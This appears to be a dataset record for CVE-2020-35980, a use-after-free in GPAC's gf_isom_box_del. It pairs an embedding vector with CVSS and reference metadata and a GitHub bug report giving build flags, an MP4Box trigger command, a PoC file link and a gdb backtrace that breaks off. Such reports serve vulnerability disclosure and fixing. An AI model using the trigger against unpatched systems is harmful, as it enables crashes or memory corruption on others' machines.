0.019008364528417587, -0.011496740393340588, 0.0048272074200212955, -0.008547439239919186, 0.01254046056419611, 0.011955345049500465, 0.0018601156771183014, 0.0018581388285383582, 0.010816740803420544, -0.018154412508010864, -0.02871812880039215, -0.033399056643247604, -0.0034533708821982145, 0.005740463268011808, -0.008990229107439518, 0.009788833558559418, 0.008650229312479496, 0.0061713932082057, -0.021949760615825653, 0.014738599769771099, -0.01063487958163023, 0.0048865098506212234, -0.004779765848070383, 0.01235860027372837, -0.0017474412452429533, -0.0064046490006148815, -0.0015645924722775817, -0.02063720114529133, 0.018154412508010864, 0.019324643537402153, -0.01457255333662033, 0.02372092194855213, 0.0027891851495951414, -0.0005900579271838069, 0.01404278539121151, -0.009583252482116222, -0.022392550483345985, -0.017110692337155342, -0.005179068073630333, -0.011646972969174385, 0.03346231207251549, -0.005716742016375065, 0.025239061564207077, 0.004451626446098089, -0.023784177377820015, -0.0040641846135258675, -0.004922091495245695, 0.010184182785451412, 0.024843711405992508, -0.0060923234559595585, -0.000025280696718255058, -0.006112090777605772, 0.028797199949622154, -0.04832742363214493, -0.005254184361547232, -0.015703249722719193, 0.013196739368140697, -0.015695342794060707, 0.0045860446989536285, 0.012548367492854595, -0.01094325166195631, 0.01586139015853405, 0.0027298827189952135, 0.013133483938872814, -0.0015408715698868036, 0.009567438624799252, -0.0012680809013545513, -0.008484182879328728, -0.004902323707938194, 0.008776741102337837, 0.025602782145142555, 0.006954183802008629, 0.002808952471241355, 0.0034355802927166224, -0.0004766422789543867, 0.02085859701037407, 0.014667436480522156, 0.015560925006866455, -0.01306232064962387, -0.002721975790336728, 0.0055111609399318695, 0.029066035524010658, 0.02528650313615799, 0.01910324953496456, -0.022218596190214157, -0.025934875011444092, -0.018960922956466675, 0.014809762127697468, 0.03466417267918587, -0.0008687787922099233, 0.009725578129291534, 0.006183253601193428, 0.004933951888233423, -0.0019263365538790822, 0.00824697408825159, 0.0001811191177694127, 0.021570224314928055, -0.020226038992404938, -0.007796276360750198, 0.010611158795654774, 0.007954415865242481, 0.008397206664085388, -0.0010120926890522242, -0.008808368816971779, 0.015537204220890999, -0.018549760803580284, -0.007689532358199358, -0.01022371742874384, 0.011899995617568493, -0.0162409245967865, 0.0015596506418660283, -0.018565574660897255, 0.004578137770295143, 0.009274880401790142, 0.008879532106220722, 0.013560459949076176, -0.006950230337679386, -0.02633022330701351, -0.005380695685744286, -0.01786976121366024, 0.006926509086042643, 0.016351621598005295, 0.011354414746165276, 0.017015807330608368, -0.0014054646017029881, -0.01609859988093376, -0.009053485468029976, -0.0004670056514441967, -0.016968365758657455, 0.010713949799537659, -0.009172089397907257, -0.013196739368140697, -0.005119765643030405, -0.0019322667503729463, 0.024638131260871887, -0.005277905147522688, 0.0006913660326972604, -0.018976736813783646, 0.00864232238382101, 0.020779527723789215, -0.0012997088488191366, -0.009836276061832905, 0.008349764160811901, 0.00178104592487216, -0.007863485254347324, -0.011117205023765564, -0.016525575891137123, 0.0063611604273319244, -0.0018423249712213874, -0.027959059923887253, -0.0031311616767197847, -0.027437198907136917, -0.01063487958163023, 0.005732556339353323, 0.004965579602867365, 0.015782320871949196, 0.0061634862795472145, -0.008069067262113094, -0.004649300593882799, 0.017189761623740196, -0.016573017463088036, -0.018012085929512978, -0.010302786715328693, 0.017790691927075386, -0.006997671909630299, -0.027168363332748413, -0.0013955809408798814, -0.017964644357562065, -0.009504182264208794, -0.01134650781750679, 0.02930324524641037, -0.007563020568341017, 0.019119063392281532, -0.0011326740495860577, -0.021775806322693825, 0.008175810799002647, 0.0021586038637906313, 0.021586038172245026, 0.01537115778774023, 0.0021526736672967672, -0.007685578893870115, 0.023578597232699394, 0.006179300136864185, -0.002463022479787469, -0.025159990414977074, -0.01823348179459572, 0.01446185540407896, -0.008760927245020866, 0.008982322178781033, 0.026867898181080818, -0.008286508731544018, -0.000047936027840478346, -0.021775806322693825, 0.009606973268091679, -0.028639059513807297, 0.004372556693851948, 0.009852089919149876, -0.00804139208048582, -0.01685766875743866, 0.01870790123939514, -0.003002673387527466, 0.01303069293498993, -0.009765112772583961, -0.006962090730667114, 0.008013717830181122, 0.0059934863820672035, -0.013947902247309685, 0.007404881063848734, 0.000921656668651849, 0.0012858716072514653, 0.02372092194855213, 0.012137205339968204, -0.019324643537402153, -0.010445112362504005, 0.00048405505367554724, 0.00017778336768969893, -0.0028168593998998404, 0.006926509086042643, 0.003226045286282897, -0.00253220833837986, 0.008452555164694786, -0.006301858462393284, 0.025254875421524048, 0.010737670585513115, 0.005645579192787409, -0.000349142326740548, 0.012493018992245197, 0.016114413738250732, 0.01649394817650318, -0.007345578633248806, 0.020811155438423157, -0.004926044959574938, -0.0049299984239041805, -0.010563717223703861, 0.0016999994404613972, 0.013086041435599327, 0.023373015224933624, 0.003568022046238184, -0.009314415045082569, 0.0008944764267653227, -0.003398022148758173, -0.0308846402913332, 0.006918602157384157, -0.0010585461277514696, -0.010247438214719296, 0.0003931248502340168, -0.0025776734109967947, 0.006206974387168884, -0.008602787740528584, 0.012445577420294285, 0.0021586038637906313, 0.022186968475580215, -0.0072981370612978935, 0.010460926219820976, -0.0047876727767288685, -0.009599066339433193, -0.009409299120306969, -0.004582091234624386, 0.006459997501224279, 0.008602787740528584, -0.01647813431918621, -0.004155114758759737, -0.0013145344564691186, 0.0006063660839572549, 0.002903836080804467, 0.02247161976993084, -0.029556268826127052, 0.0025282548740506172, -0.014619994908571243, -0.008784648030996323, -0.035012081265449524, -0.015141854993999004, 0.00636906735599041, 0.025998130440711975, -0.0019401736790314317, -0.023831618949770927, 0.010626972652971745, 0.011030228808522224, 0.008152090013027191, 0.01265115849673748, 0.00566534698009491, -0.003233952447772026, -0.029761850833892822, 0.016810227185487747, 0.005428137723356485, -0.0022119758650660515, 0.017426971346139908, 0.004423951730132103, -0.0011682553449645638, -0.020368365570902824, 0.024495804682374, 0.026456734165549278, 0.0058511607348918915, 0.0067841834388673306, -0.011417670175433159, 0.009179996326565742, -0.024448363110423088, 0.005558602511882782, -0.006930462550371885, 0.023325573652982712, -0.006135811563581228, -0.004321161191910505, -0.002886045491322875, -0.006598369684070349, 0.007262555416673422, -0.005807672161608934, -0.018992550671100616, -0.0013263948494568467, 0.00823116023093462, -0.005965811666101217, 0.010674415156245232, 0.0005510172341018915, 0.03127998858690262, -0.009891624562442303, -0.009559531696140766, -0.004953719209879637, 0.010105112567543983, -0.00942511297762394, -0.008294415660202503, 0.022439992055296898, -0.017426971346139908, -0.01045301929116249, 0.012121391482651234, 0.020352551713585854, -0.0085395323112607, 0.004613719414919615, 0.012682786211371422, 0.022993480786681175, -0.02626696787774563, 0.020526504144072533, -0.0006799997645430267, -0.0016466273227706552, -0.0009774996433407068, 0.009401392191648483, 0.0008327031973749399, -0.0029473246540874243, -0.019039994105696678, 0.018929295241832733, -0.002808952471241355, -0.0033960454165935516, -0.010721856728196144, -0.004170928616076708, 0.002943370956927538, -0.011259530670940876, 0.00804139208048582, 0.02068464457988739, 0.03314603492617607, -0.000650842790491879, -0.000665668398141861, 0.010049764066934586, -0.005234416574239731, 0.007903020828962326, 0.014185111038386822, -0.0011771507561206818, -0.003398022148758173, -0.0036589521914720535, 0.014825575985014439, 0.005349067971110344, -0.028212083503603935, 0.0013056390453130007, 0.013212553225457668, 0.0011326740495860577, -0.001346162287518382, -0.02748464234173298, 0.004336975049227476, 0.025159990414977074, -0.015007436275482178, 0.009630694054067135, 0.004147207830101252, -0.027231618762016296, 0.008476275950670242, 0.0029532548505812883, 0.0029532548505812883, 0.0034849988296628, 0.015940459445118904, 0.002939417492598295, -0.027152549475431442, -0.004400230944156647, 0.006511393003165722, -0.021396271884441376, 0.010405577719211578, -0.006167439743876457, -0.02688371203839779, -0.00331697566434741, -0.006539067253470421, 0.014627901837229729, 0.0035284871701151133, -0.0069581372663378716, -0.01589301787316799, -0.0026587198954075575, -0.010642786510288715, 0.015584645792841911, 0.004182789009064436, -0.00807697419077158, 0.014374878257513046, 0.0037301150150597095, 0.005356974899768829, -0.011212089098989964, 0.032213013619184494, -0.012746041640639305, 0.02025766670703888, 0.012572088278830051, 0.010903717018663883, 0.0043488359078764915, -0.009765112772583961, -0.010698135942220688, -0.013299530372023582, -0.01805952936410904, -0.029872547835111618, -0.012690693140029907, -0.010761391371488571, -0.01143348403275013, 0.0036233707796782255, -0.0006172381690703332, 0.02751627005636692, -0.02370510809123516, -0.004194649867713451, 0.02089022472500801, 0.010136740282177925, 0.04883347079157829, -0.029572082683444023, -0.013014879077672958, -0.02085859701037407, 0.008998136036098003, 0.006341393105685711, 0.0002461045514792204, 0.0005722672212868929, 0.012066042050719261, -0.010176275856792927, 0.018549760803580284, -0.043298590928316116, -0.018138598650693893, 0.020399993285536766, -0.019909759983420372, -0.017015807330608368, -0.011789298616349697, -0.007270462345331907, -0.01537115778774023, 0.009187904186546803, -0.009093020111322403, -0.008745113387703896, -0.021016737446188927, 0.014327436685562134, -0.0003269039443694055, 0.0054795327596366405, -0.03975626453757286, 0.011101391166448593, -0.021443713456392288, -0.02550789713859558, 0.008681857027113438, 0.0014163367450237274, -0.005700928159058094, -0.019783249124884605, -0.01665208674967289, -0.018960922956466675, 0.017426971346139908, -0.00812046229839325, -0.011322787031531334, -0.005736509803682566, -0.01042139157652855, 0.008278601802885532, -0.010951158590614796, -0.013615809381008148, -0.0037340684793889523, 0.033051151782274246, 0.0071992999874055386, -0.0025480224285274744, 0.008326043374836445, -0.0009424124727956951, 0.007132090628147125, 0.019735807552933693, 0.015560925006866455, 0.006112090777605772, -0.002490696730092168, 0.04095812514424324, 0.0035719755105674267, -0.0016100575448945165, 0.003067905781790614, 0.015608366578817368, -0.007420694921165705, -0.002085464308038354, -0.007306043989956379, 0.01644650660455227, 0.008658136241137981, -0.016367435455322266, -0.000016663329006405547, -0.0018156388541683555, 0.0003172673168592155, -0.0027852316852658987, 0.022803712636232376, -0.0003778050886467099, 0.005736509803682566, 0.029825106263160706, 0.003803254570811987, 0.0017108714673668146, 0.007685578893870115, -0.0018531969981268048, -0.018628830090165138, -0.008776741102337837, -0.011710228398442268, -0.004022672772407532, -0.027832549065351486, -0.0018680226057767868, -0.0018996504368260503, 0.01888185366988182, -0.00587883498519659, -0.008349764160811901, -0.01275394856929779, -0.012919995002448559, -0.01245348434895277, -0.015015343204140663, -0.007068834733217955, 0.0016545342514291406, 0.00012002539733657613, 0.027184177190065384, -0.011496740393340588, -0.008215346373617649, -0.002409650245681405, 0.025998130440711975, -0.003178603481501341, -0.018992550671100616, 0.008673950098454952, 0.008808368816971779, 0.013694878667593002, -0.007262555416673422, -0.0016980227082967758, 0.0034573243465274572, 0.010793019086122513, -0.01584557630121708, -0.0016723249573260546, 0.0056099980138242245, 0.02490696869790554, -0.003233952447772026, 0.009583252482116222, 0.016122320666909218, 0.002073603915050626, -0.008215346373617649, -0.017727436497807503, -0.005424184259027243, -0.02712091989815235, -0.0060923234559595585, 0.011133018881082535, -0.008610694669187069, 0.0037656964268535376, -0.0018067435594275594, 0.028417663648724556, -0.003115347819402814, 0.003320929128676653, -0.014912553131580353, -0.010484647005796432, 0.014596274122595787, 0.0006355230580084026, 0.008080927655100822, -0.0024827898014336824, 0.009290694259107113, 0.008547439239919186, -0.011615344323217869, 0.0004961626254953444, -0.003516626777127385, -0.00225744117051363, -0.0026587198954075575, -0.0006019183783791959, 0.0014380809152498841, -0.0010555810295045376, 0.010389763861894608, -0.021759992465376854, -0.008365578018128872, -0.014588367193937302, -0.012421855702996254, 0.015545111149549484, 0.010595344938337803, -0.0066023231483995914, -0.00601720716804266, 0.005491393618285656, -0.0010486624669283628, 0.0009992438135668635, 0.014224646613001823, 0.008792554959654808, -0.0022831386886537075, -0.0006859300192445517, -0.005700928159058094, -0.022961853072047234, -0.009187904186546803, -0.002799068810418248, 0.019134877249598503, -0.02470138669013977, 0.023167433217167854, 0.01283301878720522, 0.01344976294785738, -0.015576738864183426, 0.005953951273113489, 0.01143348403275013, -0.0016525575192645192, -0.003004650119692087, 0.003767673159018159, -0.013853018172085285, -0.01242976263165474, 0.004202556796371937, -0.03890231251716614, -0.02326231822371483, 0.018739528954029083, -0.021981388330459595, -0.0084446482360363, -0.009599066339433193, -0.008389299735426903, 0.0020775573793798685, 0.02546045556664467, 0.023626038804650307, -0.005807672161608934, 0.005060463212430477, 0.006392788607627153, 0.003004650119692087, -0.005404416471719742, -0.001378778601065278, 0.015213018283247948, -0.023325573652982712, -0.02131720259785652, 0.0069858115166425705, -0.00893488060683012, -0.00812046229839325, 0.0027753477916121483, 0.01043720543384552, 0.015355342999100685, -0.005360928364098072, -0.006728834938257933, -0.013370692729949951, 0.01589301787316799, -0.0008074996876530349, 0.005388602614402771, -0.013426042161881924, -0.018138598650693893, -0.011204182170331478, 0.008436741307377815, 0.01223208848387003, -0.009496275335550308, -0.012097669765353203, -0.005870928056538105, 0.008365578018128872, 0.024179525673389435, -0.001930290018208325, 0.020985109731554985, 0.009891624562442303, 0.0038586033042520285, -0.0074958112090826035, -0.011172554455697536, -0.003267556894570589, 0.015426506288349628, 0.006242556031793356, 0.0037834870163351297, 0.01905580796301365, 0.0018808714812621474, 0.014928366988897324, -0.00596976513043046, -0.01485720369964838, -0.002557906089350581, -0.004530696198344231, -0.009575345553457737, -0.009757205843925476, -0.010271159000694752, -0.019593480974435806, -0.007974183186888695, -0.012326972559094429, -0.005285812076181173, 0.006685346364974976, -0.027184177190065384, 0.02806975692510605, -0.030157199129462242, -0.0021427900064736605, -0.0020656969863921404, -0.014287902042269707, -0.00021460020798258483, 0.01723720319569111, 0.00323988264426589, -0.03211812674999237, -0.003728138282895088, -0.004131393972784281, 0.00738511374220252, 0.019008364528417587, 0.0009977612644433975, -0.012066042050719261, 0.01606697030365467, -0.036846499890089035, 0.012532553635537624, 0.011710228398442268, 0.014256274327635765, 0.016414877027273178, 0.02887626923620701, -0.007203253451734781, -0.011077670380473137, -0.0038882545195519924, 0.010872089304029942, -0.0033703476656228304, -0.008982322178781033, -0.009385578334331512, -0.021364644169807434, -0.019530225545167923, 0.022803712636232376, -0.010429298505187035, -0.007483950816094875, -0.02028929442167282, -0.010524182580411434, 0.0005213660770095885, -0.003267556894570589, 0.010579531081020832, 0.02527068927884102, 0.018375808373093605, 0.0036332544405013323, -0.026583246886730194, 0.011994879692792892, 0.008191624656319618, 0.01628836616873741, -0.0214911550283432, -0.015402785502374172, 0.035423241555690765, -0.02190231718122959, 0.020795341581106186, 0.027769291773438454, 0.012295344844460487, -0.012311158701777458, 0.01805952936410904, -0.022724643349647522, 0.014667436480522156, -0.00812046229839325, 0.0011751740239560604, -0.0078081367537379265, -0.010081391781568527, 0.013291623443365097, -0.001375813502818346, 0.0006004358292557299, -0.03852277621626854, -0.01123580988496542, -0.016074877232313156, -0.01545813400298357, 0.017347900196909904, -0.01504697185009718, -0.010737670585513115, 0.0035601151175796986, -0.005115812178701162, 0.012216274626553059, 0.026251154020428658, -0.017332086339592934, -0.0013184879207983613, -0.020194411277770996, -0.012508832849562168, -0.0349171981215477, -0.005179068073630333, 0.013932088389992714, 0.008507903665304184, -0.0041037192568182945, 0.01907162182033062, 0.0019401736790314317, -0.0028168593998998404, -0.0017088947352021933, 0.001962906215339899, 0.012469298206269741, -0.013188832439482212, -0.008602787740528584, -0.0034019756130874157, -0.007147904485464096, 0.015133948065340519, -0.023420456796884537, -0.008021624758839607, 0.01276185642927885, 0.0034711614716798067, -0.04070510342717171, 0.006535113789141178, -0.017015807330608368, 0.023373015224933624, -0.03192836046218872, 0.016414877027273178, -0.0012236041948199272, -0.011907902546226978, 0.012113484553992748, 0.007432555314153433, -0.003419766202569008, 0.013639530166983604, 0.032181382179260254, -0.007179532200098038, -0.0006290986202657223, 0.01042139157652855, 0.007906974293291569, 0.015126041136682034, -0.006199067458510399, 0.007796276360750198, 0.008286508731544018, 0.0007822962361387908, 0.00873720645904541, 0.02952464111149311, 0.0007669764454476535, -0.016905110329389572, 0.01455673947930336, -0.009859996847808361, 0.0041748820804059505, 0.0034355802927166224, -0.008966508321464062, 0.02068464457988739, 0.003002673387527466, 0.003174650017172098, -0.005783951375633478, 0.0036767427809536457, 0.0067446487955749035, -0.009780926629900932, 0.014185111038386822, -0.012010693550109863, 0.011401856318116188, 0.014619994908571243, 0.005325347185134888, -0.02006790041923523, -0.014809762127697468, 0.018106970936059952, -0.008499996736645699, -0.012999065220355988, 0.00683162547647953, 0.0076776714995503426, -0.0005475579528138041, -0.00491023063659668, -0.015031157061457634, 0.010761391371488571, -0.00942511297762394, 0.004006858915090561, -0.0012473250972107053, -0.01333906501531601, -0.007867438718676567, -0.0014874994521960616, 0.01183674018830061, -0.009093020111322403, 0.0017355807358399034, -0.01284883264452219, -0.01045301929116249, 0.004095812328159809, 0.0022475572768598795, 0.013457669876515865, -0.014240460470318794, 0.0032576732337474823, 0.0033584872726351023, -0.005728602409362793, -0.002998719923198223, 0.021348830312490463, 0.011196275241672993, 0.01927720196545124, -0.025239061564207077, 0.04358324036002159, 0.016984179615974426, -0.005645579192787409, 0.020368365570902824, 0.015236739069223404, -0.00032196208485402167, -0.009448833763599396, -0.01745859906077385, 0.011117205023765564, -0.03817487135529518, -0.006250462960451841, 0.003955463878810406, -0.004388370551168919, -0.014082320965826511, 0.026156269013881683, 0.030995337292551994, 0.00006906247290316969, -0.024258596822619438, 0.0005727614043280482, 0.0010822670301422477, 0.006230695638805628, -0.008254881016910076, 0.006206974387168884, 0.001569534302689135, -0.0010595344938337803, -0.0045741843059659, 0.03469580039381981, 0.02209208533167839, 0.009591159410774708, 0.0006799997645430267, 0.011931623332202435, 0.012690693140029907, 0.012659065425395966, 0.004981393460184336, -0.028544176369905472, -0.008397206664085388, 0.009456740692257881, 0.01965673640370369, 0.014944180846214294, -0.015315808355808258, 0.029635338112711906, 0.017411157488822937, -0.006997671909630299, -0.012674879282712936, 0.007507671602070332, -0.04699905216693878, -0.010911623947322369, 0.022645574063062668, 0.001763255218975246, -0.009172089397907257, 0.016304180026054382, 0.015213018283247948, 0.005906509701162577, 0.027152549475431442, 0.014279995113611221, 0.0007081683725118637, -0.007483950816094875, 0.02506510727107525, -0.0028998826164752245, -0.0025361618027091026, 0.027816735208034515, 0.0029749989043921232, -0.0010170345194637775, -0.0077804625034332275, -0.010524182580411434, -0.017759064212441444, 0.01516557577997446, -0.006195113994181156, -0.00793860200792551, 0.019435342401266098, -0.02025766670703888, -0.015908831730484962, -0.00441999826580286, 0.0024729061406105757, 0.00676836958155036, 0.00882418267428875, 0.00263302237726748, -0.0000985900842351839, -0.008104648441076279, 0.004210463725030422, -0.012564181350171566, 0.013291623443365097, -0.01223208848387003, 0.012880460359156132, 0.00747604388743639, 0.028986966237425804, -0.002664650324732065, 0.0005282846977934241, -0.011069763451814651, 0.013473483733832836, 0.019008364528417587, -0.020004644989967346, 0.0018423249712213874, -0.005040695890784264, 0.023626038804650307, 0.008610694669187069, -0.009994414635002613, -0.021744178608059883, 0.01603534258902073, 0.007112323306500912, 0.00883999653160572, 0.0000573873330722563, 0.006586509291082621, -0.008357671089470387, 0.004783719312399626, 0.0015734877670183778, -0.006539067253470421, 0.010674415156245232, 0.004396277479827404, 0.001602150616236031, 0.007697439286857843, 0.0014380809152498841, 0.04481672868132591, 0.019719993695616722, -0.016604645177721977, 0.010215810500085354, 0.0160511564463377, -0.0034336033277213573, -0.01986231841146946, 0.011820926330983639, 0.0010279066627845168, 0.0022119758650660515, 0.010049764066934586, 0.00807697419077158, 0.013592088595032692, 0.020305108278989792, -0.015315808355808258, -0.006226742174476385, 0.013346971943974495, 0.030188826844096184, 0.0013086041435599327, 0.011733949184417725, 0.005855114199221134, -0.020368365570902824, -0.01413766946643591, 0.02446417696774006, -0.007357439491897821, -0.0050683701410889626, -0.01728464476764202, -0.005696974694728851, -0.015679528936743736, 0.013006972149014473, 0.003809184767305851, 0.014596274122595787, 0.01085627544671297, -0.00973348505795002, -0.00962278712540865, -0.0025480224285274744, -0.0010081392247229815, 0.02588743343949318, -0.03113766387104988, 0.0016841854667291045, -0.02490696869790554, 0.005728602409362793, 0.006258369889110327, 0.0222502239048481, 0.01785394735634327, 0.0021289526484906673, -0.0017168016638606787, 0.001331336796283722, 0.0013827320653945208, 0.012239995412528515, -0.002427441067993641, 0.006151625886559486, -0.011631159111857414, -0.013418135233223438, -0.013346971943974495, -0.0016476156888529658, 0.010998601093888283, 0.007768602110445499, 0.012777670286595821, 0.010089298710227013, -0.0031469755340367556, 0.019609294831752777, -0.0004247527685947716, 0.018375808373093605, 0.006709067616611719, -0.01577441394329071, 0.020985109731554985, -0.011607437394559383, -0.0023760455660521984, 0.004605812486261129, 0.0031825569458305836, -0.0028524408116936684, -0.018613016232848167, 0.005629765335470438, 0.007527439389377832, 0.0016495924210175872, 0.009433019906282425, -0.004902323707938194, 0.006420462857931852, 0.019340457394719124, -0.0013708715559914708, -0.003631277708336711, -0.010152554139494896, -0.0005609009531326592, -0.0007986043929122388, -0.00039781961822882295, -0.003148952266201377, -0.0059499978087842464, -0.0021190689876675606, 0.014825575985014439, -0.0031667430885136127, 0.004352789372205734, 0.00824697408825159, -0.003137091873213649, -0.0013214530190452933, 0.00566534698009491, -0.02046324871480465, 0.0006409590714611113, 0.00003721837492776103, 0.005404416471719742, 0.004400230944156647, -0.010271159000694752, 0.003708370728418231, 0.0003642149968072772, 0.0010209879837930202, 0.0015744761331006885, 0.006096276920288801, -0.004042440559715033, 0.013457669876515865, -0.015094413422048092, -0.02346789836883545, -0.01946697011590004, 0.012073948979377747, 0.0010526159312576056, 0.001572499400936067, -0.0007748834323137999, -0.02330975979566574, 0.014098134823143482, -0.0007210171897895634, 0.0005574416718445718, 0.016746971756219864, -0.010192089714109898, 0.014991622418165207, -0.009314415045082569, 0.0010506391990929842, -0.008381392806768417, -0.011986972764134407, 0.006780229974538088, 0.03434789553284645, 0.009701857343316078, -0.015813948586583138, 0.011828833259642124, 0.023752549663186073, 0.010492554865777493, 0.06180090829730034, 0.0032023245003074408, 0.008159996941685677, 0.0017177901463583112, -0.0032952313777059317, -0.010152554139494896, -0.007313950918614864, 0.003026394173502922, -0.00502092856913805, 0.006175346672534943, 0.006179300136864185, 0.009093020111322403, 0.0042776730842888355, -0.013789762742817402, -0.012785577215254307, 0.0020034294575452805, 0.005396509543061256, 0.0023483713157474995, -0.0029196501709520817, -0.01665208674967289, 0.0038803473580628633, -0.013655344024300575, 0.007270462345331907, -0.0005386625998653471, -0.00546371890231967, 0.0019549992866814137, 0.014438134618103504, -0.021775806322693825, -0.006697206757962704, -0.03431626781821251, 0.016090691089630127, 0.004317207727581263, 0.005657440051436424, 0.009670228697359562, 0.021570224314928055, 0.01970417983829975, 0.025159990414977074, 0.019024180248379707, -0.0153474360704422, -0.011615344323217869, -0.021396271884441376, -0.0115441819652915, -0.009369764477014542, -0.008990229107439518, -0.011133018881082535, 0.020732086151838303, -0.008942787535488605, 0.008341857232153416, 0.031185105443000793, 0.014390693046152592, 0.00383685901761055, 0.01905580796301365, 0.01668371446430683, 0.02389487437903881, 0.026614874601364136, 0.006946276407688856, 0.021649295464158058, -0.007147904485464096, 0.005989532917737961, -0.003291277913376689, -0.009670228697359562, 0.01984650455415249, -0.011583716608583927, -0.0026824409142136574, -0.011805112473666668, 0.003902091644704342, -0.015434413217008114, -0.021396271884441376, -0.001881859847344458, 0.006396742071956396, -0.0015972087858244777, -0.0032734873238950968, 0.013805576600134373, -0.009314415045082569, 0.011512554250657558, -0.018723715096712112, -0.00356209184974432, -0.012572088278830051, 0.019119063392281532, -0.008373485878109932, 0.008863718248903751, -0.013149297796189785, -0.01043720543384552, -0.0027417431119829416, -0.0029710454400628805, -0.017221389338374138, -0.008523717522621155, -0.011520461179316044, 0.01306232064962387, -0.0030896500684320927, 0.008847903460264206, 0.006772323045879602, 0.013418135233223438, -0.022629760205745697, 0.024053014814853668, -0.0048272074200212955, -0.013275809586048126, 0.008389299735426903, 0.01907162182033062, -0.0039712777361273766, 0.002597440965473652, -0.01709487847983837, -0.02546045556664467, 0.00581953302025795, -0.010642786510288715, -0.029999058693647385, -0.012666972354054451, -0.005317439790815115, -0.02330975979566574, -0.014477669261395931, 0.003908021841198206, -0.022550689056515694, -0.011085577309131622, -0.0057206954807043076, 0.001843313337303698, -0.004961626138538122, 0.008911159820854664, 0.007195346523076296, 0.0192455742508173, -0.0007971217855811119, -0.008705578744411469, 0.007713253144174814, -0.006930462550371885, -0.0345376618206501, -0.01828092336654663, 0.003815114963799715, -0.0107455775141716, 0.015284180641174316, 0.010310693643987179, 0.0027891851495951414, 0.005044649355113506, 0.005301625933498144, 0.014786041341722012, 0.026409292593598366, 0.01495208777487278, -0.00944092683494091, -0.0010150577872991562, -0.006258369889110327, -0.0066458117216825485, 0.02753208391368389, -0.010571624152362347, 0.02228185348212719, -0.001176162390038371, 0.003378254594281316, -0.027231618762016296, 0.005530928261578083, 0.00782790407538414, -0.008990229107439518, -0.011749763041734695, 0.0017118598334491253, 0.0011445344425737858, 0.0037874404806643724, 0.013694878667593002, -0.02511254884302616, -0.004491161089390516, 0.034031614661216736, 0.0009280810481868684, 0.020621387287974358, 0.005222556181252003, 0.010081391781568527, 0.013971623033285141, 0.010113019496202469, 0.003245812840759754, -0.0030481384601444006, -0.008349764160811901, -0.0004944329848513007, 0.0019945341628044844, 0.0062346491031348705, 0.02651999145746231, -0.0042341845110058784, -0.01625673845410347, 0.0004662643768824637, 0.0020419759675860405, 0.0008257845765911043, -0.0013362786266952753, 0.010666508227586746, 0.0013590111630037427, -0.006839532405138016, 0.0184865053743124, 0.014738599769771099, -0.02005208656191826, 0.0043053473345935345, -0.030252082273364067, 0.022234410047531128, -0.014714878983795643, -0.010674415156245232, -0.0036352311726659536, -0.02746882662177086, -0.010959065519273281, 0.012682786211371422, 0.0010773251997306943, -0.0025183712132275105, 0.02326231822371483, 0.006203020922839642, -0.005973718594759703, 0.021443713456392288, 0.017616737633943558, -0.014944180846214294, 0.009179996326565742, -0.005345114506781101, 0.015252552926540375, -0.01685766875743866, -0.005123719107359648, 0.019530225545167923 ]
2,298
CVE-2020-35980
2021-04-21T16:15:08.687000
An issue was discovered in GPAC version 0.8.0 and 1.0.1. There is a use-after-free in the function gf_isom_box_del() in isomedia/box_funcs.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/5aba27604d957e960d8069d85ccaf868f8a7b07a" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1661" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1661
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master c4f8bc6e and the latest V1.0.1 d8538e8) I think it is probably due to an imcomplete fix of [#1340](https://github.com/gpac/gpac/issues/1340) 、[#1440](https://github.com/gpac/gpac/issues/1440) and [#1332](https://github.com/gpac/gpac/issues/1332). Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box --extra-ldflags="-ldl -g" $ make ``` Run Command: ``` $ MP4Box -hint $gf_isom_box_del-UAF -out /dev/null ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-c4f8bc6e_poc/gf_isom_box_del-UAF gdb info: ```C Program received signal SIGSEGV, Segmentation fault. __GI___libc_free (mem=0x7ffff6867010) at malloc.c:2958 2958 malloc.c: No such file or directory. (gdb) bt #0 __GI___libc_free (mem=0x7ffff6867010) at malloc.c:2958 #1 0x00000000008d8557 in co64_box_del () #2 0x000000000053f9d4 in gf_isom_box_del () #3 0x000000000053fa07 in gf_isom_box_del () #4 0x000000000053fa07 in 